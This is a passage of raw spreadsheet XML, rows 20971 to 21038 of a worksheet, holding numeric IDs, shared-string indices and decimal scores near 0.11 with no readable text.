        <v>20238</v>
      </c>
      <c r="D20971" s="2">
        <v>1.0</v>
      </c>
      <c r="E20971" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20971" s="2">
        <v>0.1120218579234973</v>
      </c>
    </row>
    <row r="20972" ht="15.75" customHeight="1">
      <c r="A20972" s="1">
        <v>18285.0</v>
      </c>
      <c r="B20972" s="2">
        <v>5.2258868E7</v>
      </c>
      <c r="C20972" s="2" t="s">
        <v>20239</v>
      </c>
      <c r="D20972" s="2">
        <v>1.0</v>
      </c>
      <c r="E20972" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20972" s="2">
        <v>0.1120218579234973</v>
      </c>
    </row>
    <row r="20973" ht="15.75" customHeight="1">
      <c r="A20973" s="1">
        <v>1031.0</v>
      </c>
      <c r="B20973" s="2">
        <v>2.318267E7</v>
      </c>
      <c r="C20973" s="2" t="s">
        <v>20240</v>
      </c>
      <c r="D20973" s="2">
        <v>1.0</v>
      </c>
      <c r="E20973" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20973" s="2">
        <v>0.1120218579234972</v>
      </c>
    </row>
    <row r="20974" ht="15.75" customHeight="1">
      <c r="A20974" s="1">
        <v>9821.0</v>
      </c>
      <c r="B20974" s="2">
        <v>5.6626803E7</v>
      </c>
      <c r="C20974" s="2" t="s">
        <v>20241</v>
      </c>
      <c r="D20974" s="2">
        <v>1.0</v>
      </c>
      <c r="E20974" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20974" s="2">
        <v>0.1120218579234972</v>
      </c>
    </row>
    <row r="20975" ht="15.75" customHeight="1">
      <c r="A20975" s="1">
        <v>27886.0</v>
      </c>
      <c r="B20975" s="2">
        <v>2.3590073E7</v>
      </c>
      <c r="C20975" s="2" t="s">
        <v>20242</v>
      </c>
      <c r="D20975" s="2">
        <v>1.0</v>
      </c>
      <c r="E20975" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20975" s="2">
        <v>0.1120218579234972</v>
      </c>
    </row>
    <row r="20976" ht="15.75" customHeight="1">
      <c r="A20976" s="1">
        <v>5719.0</v>
      </c>
      <c r="B20976" s="2">
        <v>4.6589294E7</v>
      </c>
      <c r="C20976" s="2" t="s">
        <v>20243</v>
      </c>
      <c r="D20976" s="2">
        <v>1.0</v>
      </c>
      <c r="E20976" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20976" s="2">
        <v>0.1120071684587814</v>
      </c>
    </row>
    <row r="20977" ht="15.75" customHeight="1">
      <c r="A20977" s="1">
        <v>15348.0</v>
      </c>
      <c r="B20977" s="2">
        <v>4.2622057E7</v>
      </c>
      <c r="C20977" s="2" t="s">
        <v>20244</v>
      </c>
      <c r="D20977" s="2">
        <v>1.0</v>
      </c>
      <c r="E20977" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20977" s="2">
        <v>0.1120071684587814</v>
      </c>
    </row>
    <row r="20978" ht="15.75" customHeight="1">
      <c r="A20978" s="1">
        <v>19780.0</v>
      </c>
      <c r="B20978" s="2">
        <v>5.6776419E7</v>
      </c>
      <c r="C20978" s="2" t="s">
        <v>20245</v>
      </c>
      <c r="D20978" s="2">
        <v>1.0</v>
      </c>
      <c r="E20978" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20978" s="2">
        <v>0.1120071684587814</v>
      </c>
    </row>
    <row r="20979" ht="15.75" customHeight="1">
      <c r="A20979" s="1">
        <v>19778.0</v>
      </c>
      <c r="B20979" s="2">
        <v>5.6776419E7</v>
      </c>
      <c r="C20979" s="2" t="s">
        <v>20246</v>
      </c>
      <c r="D20979" s="2">
        <v>1.0</v>
      </c>
      <c r="E20979" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20979" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="20980" ht="15.75" customHeight="1">
      <c r="A20980" s="1">
        <v>20281.0</v>
      </c>
      <c r="B20980" s="2">
        <v>1.116617E7</v>
      </c>
      <c r="C20980" s="2" t="s">
        <v>20037</v>
      </c>
      <c r="D20980" s="2">
        <v>1.0</v>
      </c>
      <c r="E20980" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20980" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="20981" ht="15.75" customHeight="1">
      <c r="A20981" s="1">
        <v>22122.0</v>
      </c>
      <c r="B20981" s="2">
        <v>3.0994648E7</v>
      </c>
      <c r="C20981" s="2" t="s">
        <v>20247</v>
      </c>
      <c r="D20981" s="2">
        <v>1.0</v>
      </c>
      <c r="E20981" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20981" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="20982" ht="15.75" customHeight="1">
      <c r="A20982" s="1">
        <v>30888.0</v>
      </c>
      <c r="B20982" s="2">
        <v>4.6538418E7</v>
      </c>
      <c r="C20982" s="2" t="s">
        <v>20248</v>
      </c>
      <c r="D20982" s="2">
        <v>1.0</v>
      </c>
      <c r="E20982" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20982" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="20983" ht="15.75" customHeight="1">
      <c r="A20983" s="1">
        <v>29453.0</v>
      </c>
      <c r="B20983" s="2">
        <v>3.2242295E7</v>
      </c>
      <c r="C20983" s="2" t="s">
        <v>20249</v>
      </c>
      <c r="D20983" s="2">
        <v>1.0</v>
      </c>
      <c r="E20983" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20983" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="20984" ht="15.75" customHeight="1">
      <c r="A20984" s="1">
        <v>30547.0</v>
      </c>
      <c r="B20984" s="2">
        <v>4.0622052E7</v>
      </c>
      <c r="C20984" s="2" t="s">
        <v>20250</v>
      </c>
      <c r="D20984" s="2">
        <v>1.0</v>
      </c>
      <c r="E20984" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20984" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="20985" ht="15.75" customHeight="1">
      <c r="A20985" s="1">
        <v>26739.0</v>
      </c>
      <c r="B20985" s="2">
        <v>1.8284166E7</v>
      </c>
      <c r="C20985" s="2" t="s">
        <v>20251</v>
      </c>
      <c r="D20985" s="2">
        <v>1.0</v>
      </c>
      <c r="E20985" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20985" s="2">
        <v>0.1118935837245697</v>
      </c>
    </row>
    <row r="20986" ht="15.75" customHeight="1">
      <c r="A20986" s="1">
        <v>8313.0</v>
      </c>
      <c r="B20986" s="2">
        <v>5.3620687E7</v>
      </c>
      <c r="C20986" s="2" t="s">
        <v>20252</v>
      </c>
      <c r="D20986" s="2">
        <v>1.0</v>
      </c>
      <c r="E20986" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20986" s="2">
        <v>0.1103286384976526</v>
      </c>
    </row>
    <row r="20987" ht="15.75" customHeight="1">
      <c r="A20987" s="1">
        <v>17502.0</v>
      </c>
      <c r="B20987" s="2">
        <v>5.0005842E7</v>
      </c>
      <c r="C20987" s="2" t="s">
        <v>20253</v>
      </c>
      <c r="D20987" s="2">
        <v>1.0</v>
      </c>
      <c r="E20987" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20987" s="2">
        <v>0.1102819237147595</v>
      </c>
    </row>
    <row r="20988" ht="15.75" customHeight="1">
      <c r="A20988" s="1">
        <v>30700.0</v>
      </c>
      <c r="B20988" s="2">
        <v>4.2591572E7</v>
      </c>
      <c r="C20988" s="2" t="s">
        <v>20254</v>
      </c>
      <c r="D20988" s="2">
        <v>1.0</v>
      </c>
      <c r="E20988" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20988" s="2">
        <v>0.1102693602693603</v>
      </c>
    </row>
    <row r="20989" ht="15.75" customHeight="1">
      <c r="A20989" s="1">
        <v>24762.0</v>
      </c>
      <c r="B20989" s="2">
        <v>1.1836647E7</v>
      </c>
      <c r="C20989" s="2" t="s">
        <v>20255</v>
      </c>
      <c r="D20989" s="2">
        <v>1.0</v>
      </c>
      <c r="E20989" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20989" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="20990" ht="15.75" customHeight="1">
      <c r="A20990" s="1">
        <v>4498.0</v>
      </c>
      <c r="B20990" s="2">
        <v>4.2562931E7</v>
      </c>
      <c r="C20990" s="2" t="s">
        <v>20256</v>
      </c>
      <c r="D20990" s="2">
        <v>1.0</v>
      </c>
      <c r="E20990" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20990" s="2">
        <v>0.1102430555555556</v>
      </c>
    </row>
    <row r="20991" ht="15.75" customHeight="1">
      <c r="A20991" s="1">
        <v>1255.0</v>
      </c>
      <c r="B20991" s="2">
        <v>2.5207648E7</v>
      </c>
      <c r="C20991" s="2" t="s">
        <v>20257</v>
      </c>
      <c r="D20991" s="2">
        <v>1.0</v>
      </c>
      <c r="E20991" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20991" s="2">
        <v>0.1102430555555555</v>
      </c>
    </row>
    <row r="20992" ht="15.75" customHeight="1">
      <c r="A20992" s="1">
        <v>10142.0</v>
      </c>
      <c r="B20992" s="2">
        <v>5.7305907E7</v>
      </c>
      <c r="C20992" s="2" t="s">
        <v>20258</v>
      </c>
      <c r="D20992" s="2">
        <v>1.0</v>
      </c>
      <c r="E20992" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20992" s="2">
        <v>0.1102150537634408</v>
      </c>
    </row>
    <row r="20993" ht="15.75" customHeight="1">
      <c r="A20993" s="1">
        <v>2028.0</v>
      </c>
      <c r="B20993" s="2">
        <v>3.0808073E7</v>
      </c>
      <c r="C20993" s="2" t="s">
        <v>20259</v>
      </c>
      <c r="D20993" s="2">
        <v>1.0</v>
      </c>
      <c r="E20993" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20993" s="2">
        <v>0.1102003642987249</v>
      </c>
    </row>
    <row r="20994" ht="15.75" customHeight="1">
      <c r="A20994" s="1">
        <v>21551.0</v>
      </c>
      <c r="B20994" s="2">
        <v>2.3590074E7</v>
      </c>
      <c r="C20994" s="2" t="s">
        <v>20242</v>
      </c>
      <c r="D20994" s="2">
        <v>1.0</v>
      </c>
      <c r="E20994" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20994" s="2">
        <v>0.1102003642987249</v>
      </c>
    </row>
    <row r="20995" ht="15.75" customHeight="1">
      <c r="A20995" s="1">
        <v>28750.0</v>
      </c>
      <c r="B20995" s="2">
        <v>2.8122951E7</v>
      </c>
      <c r="C20995" s="2" t="s">
        <v>20260</v>
      </c>
      <c r="D20995" s="2">
        <v>1.0</v>
      </c>
      <c r="E20995" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20995" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="20996" ht="15.75" customHeight="1">
      <c r="A20996" s="1">
        <v>17576.0</v>
      </c>
      <c r="B20996" s="2">
        <v>5.0266539E7</v>
      </c>
      <c r="C20996" s="2" t="s">
        <v>20261</v>
      </c>
      <c r="D20996" s="2">
        <v>1.0</v>
      </c>
      <c r="E20996" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20996" s="2">
        <v>0.1101851851851851</v>
      </c>
    </row>
    <row r="20997" ht="15.75" customHeight="1">
      <c r="A20997" s="1">
        <v>8258.0</v>
      </c>
      <c r="B20997" s="2">
        <v>5.3402139E7</v>
      </c>
      <c r="C20997" s="2" t="s">
        <v>20262</v>
      </c>
      <c r="D20997" s="2">
        <v>1.0</v>
      </c>
      <c r="E20997" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20997" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="20998" ht="15.75" customHeight="1">
      <c r="A20998" s="1">
        <v>9627.0</v>
      </c>
      <c r="B20998" s="2">
        <v>5.6220828E7</v>
      </c>
      <c r="C20998" s="2" t="s">
        <v>20263</v>
      </c>
      <c r="D20998" s="2">
        <v>1.0</v>
      </c>
      <c r="E20998" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20998" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="20999" ht="15.75" customHeight="1">
      <c r="A20999" s="1">
        <v>8566.0</v>
      </c>
      <c r="B20999" s="2">
        <v>5.4183908E7</v>
      </c>
      <c r="C20999" s="2" t="s">
        <v>20264</v>
      </c>
      <c r="D20999" s="2">
        <v>1.0</v>
      </c>
      <c r="E20999" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20999" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="21000" ht="15.75" customHeight="1">
      <c r="A21000" s="1">
        <v>1479.0</v>
      </c>
      <c r="B21000" s="2">
        <v>2.7131482E7</v>
      </c>
      <c r="C21000" s="2" t="s">
        <v>20265</v>
      </c>
      <c r="D21000" s="2">
        <v>1.0</v>
      </c>
      <c r="E21000" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21000" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="21001" ht="15.75" customHeight="1">
      <c r="A21001" s="1">
        <v>1770.0</v>
      </c>
      <c r="B21001" s="2">
        <v>2.9019661E7</v>
      </c>
      <c r="C21001" s="2" t="s">
        <v>20266</v>
      </c>
      <c r="D21001" s="2">
        <v>1.0</v>
      </c>
      <c r="E21001" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21001" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="21002" ht="15.75" customHeight="1">
      <c r="A21002" s="1">
        <v>4806.0</v>
      </c>
      <c r="B21002" s="2">
        <v>4.3551703E7</v>
      </c>
      <c r="C21002" s="2" t="s">
        <v>20267</v>
      </c>
      <c r="D21002" s="2">
        <v>1.0</v>
      </c>
      <c r="E21002" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21002" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="21003" ht="15.75" customHeight="1">
      <c r="A21003" s="1">
        <v>9918.0</v>
      </c>
      <c r="B21003" s="2">
        <v>5.680236E7</v>
      </c>
      <c r="C21003" s="2" t="s">
        <v>20268</v>
      </c>
      <c r="D21003" s="2">
        <v>1.0</v>
      </c>
      <c r="E21003" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21003" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="21004" ht="15.75" customHeight="1">
      <c r="A21004" s="1">
        <v>10379.0</v>
      </c>
      <c r="B21004" s="2">
        <v>7986508.0</v>
      </c>
      <c r="C21004" s="2" t="s">
        <v>20269</v>
      </c>
      <c r="D21004" s="2">
        <v>1.0</v>
      </c>
      <c r="E21004" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21004" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="21005" ht="15.75" customHeight="1">
      <c r="A21005" s="1">
        <v>11577.0</v>
      </c>
      <c r="B21005" s="2">
        <v>2.2793139E7</v>
      </c>
      <c r="C21005" s="2" t="s">
        <v>20270</v>
      </c>
      <c r="D21005" s="2">
        <v>1.0</v>
      </c>
      <c r="E21005" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21005" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="21006" ht="15.75" customHeight="1">
      <c r="A21006" s="1">
        <v>16622.0</v>
      </c>
      <c r="B21006" s="2">
        <v>4.7063725E7</v>
      </c>
      <c r="C21006" s="2" t="s">
        <v>20271</v>
      </c>
      <c r="D21006" s="2">
        <v>1.0</v>
      </c>
      <c r="E21006" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21006" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="21007" ht="15.75" customHeight="1">
      <c r="A21007" s="1">
        <v>19998.0</v>
      </c>
      <c r="B21007" s="2">
        <v>5.7706159E7</v>
      </c>
      <c r="C21007" s="2" t="s">
        <v>20272</v>
      </c>
      <c r="D21007" s="2">
        <v>1.0</v>
      </c>
      <c r="E21007" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21007" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="21008" ht="15.75" customHeight="1">
      <c r="A21008" s="1">
        <v>28340.0</v>
      </c>
      <c r="B21008" s="2">
        <v>2.5890082E7</v>
      </c>
      <c r="C21008" s="2" t="s">
        <v>20273</v>
      </c>
      <c r="D21008" s="2">
        <v>1.0</v>
      </c>
      <c r="E21008" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21008" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="21009" ht="15.75" customHeight="1">
      <c r="A21009" s="1">
        <v>29105.0</v>
      </c>
      <c r="B21009" s="2">
        <v>3.0431969E7</v>
      </c>
      <c r="C21009" s="2" t="s">
        <v>20274</v>
      </c>
      <c r="D21009" s="2">
        <v>1.0</v>
      </c>
      <c r="E21009" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21009" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="21010" ht="15.75" customHeight="1">
      <c r="A21010" s="1">
        <v>33550.0</v>
      </c>
      <c r="B21010" s="2">
        <v>8184793.0</v>
      </c>
      <c r="C21010" s="2" t="s">
        <v>20275</v>
      </c>
      <c r="D21010" s="2">
        <v>1.0</v>
      </c>
      <c r="E21010" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21010" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="21011" ht="15.75" customHeight="1">
      <c r="A21011" s="1">
        <v>158.0</v>
      </c>
      <c r="B21011" s="2">
        <v>1.3732786E7</v>
      </c>
      <c r="C21011" s="2" t="s">
        <v>20276</v>
      </c>
      <c r="D21011" s="2">
        <v>1.0</v>
      </c>
      <c r="E21011" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21011" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21012" ht="15.75" customHeight="1">
      <c r="A21012" s="1">
        <v>259.0</v>
      </c>
      <c r="B21012" s="2">
        <v>1.5145229E7</v>
      </c>
      <c r="C21012" s="2" t="s">
        <v>20277</v>
      </c>
      <c r="D21012" s="2">
        <v>1.0</v>
      </c>
      <c r="E21012" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21012" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21013" ht="15.75" customHeight="1">
      <c r="A21013" s="1">
        <v>350.0</v>
      </c>
      <c r="B21013" s="2">
        <v>1.6044962E7</v>
      </c>
      <c r="C21013" s="2" t="s">
        <v>20278</v>
      </c>
      <c r="D21013" s="2">
        <v>1.0</v>
      </c>
      <c r="E21013" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21013" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21014" ht="15.75" customHeight="1">
      <c r="A21014" s="1">
        <v>425.0</v>
      </c>
      <c r="B21014" s="2">
        <v>1.6910064E7</v>
      </c>
      <c r="C21014" s="2" t="s">
        <v>20279</v>
      </c>
      <c r="D21014" s="2">
        <v>1.0</v>
      </c>
      <c r="E21014" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21014" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21015" ht="15.75" customHeight="1">
      <c r="A21015" s="1">
        <v>871.0</v>
      </c>
      <c r="B21015" s="2">
        <v>2.1869936E7</v>
      </c>
      <c r="C21015" s="2" t="s">
        <v>20280</v>
      </c>
      <c r="D21015" s="2">
        <v>1.0</v>
      </c>
      <c r="E21015" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21015" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21016" ht="15.75" customHeight="1">
      <c r="A21016" s="1">
        <v>1191.0</v>
      </c>
      <c r="B21016" s="2">
        <v>2.4705276E7</v>
      </c>
      <c r="C21016" s="2" t="s">
        <v>20281</v>
      </c>
      <c r="D21016" s="2">
        <v>1.0</v>
      </c>
      <c r="E21016" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21016" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21017" ht="15.75" customHeight="1">
      <c r="A21017" s="1">
        <v>1581.0</v>
      </c>
      <c r="B21017" s="2">
        <v>2.7730877E7</v>
      </c>
      <c r="C21017" s="2" t="s">
        <v>20282</v>
      </c>
      <c r="D21017" s="2">
        <v>1.0</v>
      </c>
      <c r="E21017" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21017" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21018" ht="15.75" customHeight="1">
      <c r="A21018" s="1">
        <v>1586.0</v>
      </c>
      <c r="B21018" s="2">
        <v>2.7736273E7</v>
      </c>
      <c r="C21018" s="2" t="s">
        <v>20283</v>
      </c>
      <c r="D21018" s="2">
        <v>1.0</v>
      </c>
      <c r="E21018" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21018" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21019" ht="15.75" customHeight="1">
      <c r="A21019" s="1">
        <v>1707.0</v>
      </c>
      <c r="B21019" s="2">
        <v>2.8572219E7</v>
      </c>
      <c r="C21019" s="2" t="s">
        <v>20284</v>
      </c>
      <c r="D21019" s="2">
        <v>1.0</v>
      </c>
      <c r="E21019" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21019" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21020" ht="15.75" customHeight="1">
      <c r="A21020" s="1">
        <v>2025.0</v>
      </c>
      <c r="B21020" s="2">
        <v>3.0785514E7</v>
      </c>
      <c r="C21020" s="2" t="s">
        <v>20285</v>
      </c>
      <c r="D21020" s="2">
        <v>1.0</v>
      </c>
      <c r="E21020" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21020" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21021" ht="15.75" customHeight="1">
      <c r="A21021" s="1">
        <v>2129.0</v>
      </c>
      <c r="B21021" s="2">
        <v>3.1438338E7</v>
      </c>
      <c r="C21021" s="2" t="s">
        <v>20286</v>
      </c>
      <c r="D21021" s="2">
        <v>1.0</v>
      </c>
      <c r="E21021" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21021" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21022" ht="15.75" customHeight="1">
      <c r="A21022" s="1">
        <v>2157.0</v>
      </c>
      <c r="B21022" s="2">
        <v>3.1742245E7</v>
      </c>
      <c r="C21022" s="2" t="s">
        <v>20287</v>
      </c>
      <c r="D21022" s="2">
        <v>1.0</v>
      </c>
      <c r="E21022" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21022" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21023" ht="15.75" customHeight="1">
      <c r="A21023" s="1">
        <v>2495.0</v>
      </c>
      <c r="B21023" s="2">
        <v>3.3895004E7</v>
      </c>
      <c r="C21023" s="2" t="s">
        <v>20288</v>
      </c>
      <c r="D21023" s="2">
        <v>1.0</v>
      </c>
      <c r="E21023" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21023" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21024" ht="15.75" customHeight="1">
      <c r="A21024" s="1">
        <v>2629.0</v>
      </c>
      <c r="B21024" s="2">
        <v>3.4545625E7</v>
      </c>
      <c r="C21024" s="2" t="s">
        <v>20289</v>
      </c>
      <c r="D21024" s="2">
        <v>1.0</v>
      </c>
      <c r="E21024" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21024" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21025" ht="15.75" customHeight="1">
      <c r="A21025" s="1">
        <v>2792.0</v>
      </c>
      <c r="B21025" s="2">
        <v>3.5258546E7</v>
      </c>
      <c r="C21025" s="2" t="s">
        <v>20290</v>
      </c>
      <c r="D21025" s="2">
        <v>1.0</v>
      </c>
      <c r="E21025" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21025" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21026" ht="15.75" customHeight="1">
      <c r="A21026" s="1">
        <v>2939.0</v>
      </c>
      <c r="B21026" s="2">
        <v>3.5954956E7</v>
      </c>
      <c r="C21026" s="2" t="s">
        <v>20291</v>
      </c>
      <c r="D21026" s="2">
        <v>1.0</v>
      </c>
      <c r="E21026" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21026" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21027" ht="15.75" customHeight="1">
      <c r="A21027" s="1">
        <v>2943.0</v>
      </c>
      <c r="B21027" s="2">
        <v>3.5981483E7</v>
      </c>
      <c r="C21027" s="2" t="s">
        <v>20292</v>
      </c>
      <c r="D21027" s="2">
        <v>1.0</v>
      </c>
      <c r="E21027" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21027" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21028" ht="15.75" customHeight="1">
      <c r="A21028" s="1">
        <v>3101.0</v>
      </c>
      <c r="B21028" s="2">
        <v>3.6702478E7</v>
      </c>
      <c r="C21028" s="2" t="s">
        <v>20293</v>
      </c>
      <c r="D21028" s="2">
        <v>1.0</v>
      </c>
      <c r="E21028" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21028" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21029" ht="15.75" customHeight="1">
      <c r="A21029" s="1">
        <v>3200.0</v>
      </c>
      <c r="B21029" s="2">
        <v>3.7238903E7</v>
      </c>
      <c r="C21029" s="2" t="s">
        <v>20294</v>
      </c>
      <c r="D21029" s="2">
        <v>1.0</v>
      </c>
      <c r="E21029" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21029" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21030" ht="15.75" customHeight="1">
      <c r="A21030" s="1">
        <v>3816.0</v>
      </c>
      <c r="B21030" s="2">
        <v>4.0082949E7</v>
      </c>
      <c r="C21030" s="2" t="s">
        <v>20295</v>
      </c>
      <c r="D21030" s="2">
        <v>1.0</v>
      </c>
      <c r="E21030" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21030" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21031" ht="15.75" customHeight="1">
      <c r="A21031" s="1">
        <v>4096.0</v>
      </c>
      <c r="B21031" s="2">
        <v>4.1278347E7</v>
      </c>
      <c r="C21031" s="2" t="s">
        <v>20296</v>
      </c>
      <c r="D21031" s="2">
        <v>1.0</v>
      </c>
      <c r="E21031" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21031" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21032" ht="15.75" customHeight="1">
      <c r="A21032" s="1">
        <v>4122.0</v>
      </c>
      <c r="B21032" s="2">
        <v>4.1367064E7</v>
      </c>
      <c r="C21032" s="2" t="s">
        <v>20297</v>
      </c>
      <c r="D21032" s="2">
        <v>1.0</v>
      </c>
      <c r="E21032" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21032" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21033" ht="15.75" customHeight="1">
      <c r="A21033" s="1">
        <v>4183.0</v>
      </c>
      <c r="B21033" s="2">
        <v>4.1567288E7</v>
      </c>
      <c r="C21033" s="2" t="s">
        <v>20298</v>
      </c>
      <c r="D21033" s="2">
        <v>1.0</v>
      </c>
      <c r="E21033" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21033" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21034" ht="15.75" customHeight="1">
      <c r="A21034" s="1">
        <v>4511.0</v>
      </c>
      <c r="B21034" s="2">
        <v>4.2586294E7</v>
      </c>
      <c r="C21034" s="2" t="s">
        <v>20299</v>
      </c>
      <c r="D21034" s="2">
        <v>1.0</v>
      </c>
      <c r="E21034" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21034" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21035" ht="15.75" customHeight="1">
      <c r="A21035" s="1">
        <v>4650.0</v>
      </c>
      <c r="B21035" s="2">
        <v>4.3081522E7</v>
      </c>
      <c r="C21035" s="2" t="s">
        <v>20295</v>
      </c>
      <c r="D21035" s="2">
        <v>1.0</v>
      </c>
      <c r="E21035" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21035" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21036" ht="15.75" customHeight="1">
      <c r="A21036" s="1">
        <v>5415.0</v>
      </c>
      <c r="B21036" s="2">
        <v>4.5532613E7</v>
      </c>
      <c r="C21036" s="2" t="s">
        <v>20300</v>
      </c>
      <c r="D21036" s="2">
        <v>1.0</v>
      </c>
      <c r="E21036" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21036" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21037" ht="15.75" customHeight="1">
      <c r="A21037" s="1">
        <v>5466.0</v>
      </c>
      <c r="B21037" s="2">
        <v>4.5671128E7</v>
      </c>
      <c r="C21037" s="2" t="s">
        <v>20301</v>
      </c>
      <c r="D21037" s="2">
        <v>1.0</v>
      </c>
      <c r="E21037" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21037" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21038" ht="15.75" customHeight="1">
      <c r="A21038" s="1">
        <v>5535.0</v>
      </c>
      <c r="B21038" s="2">
        <v>4.5898779E7</v>
      </c>
      <c r="C21038" s="2" t="s">
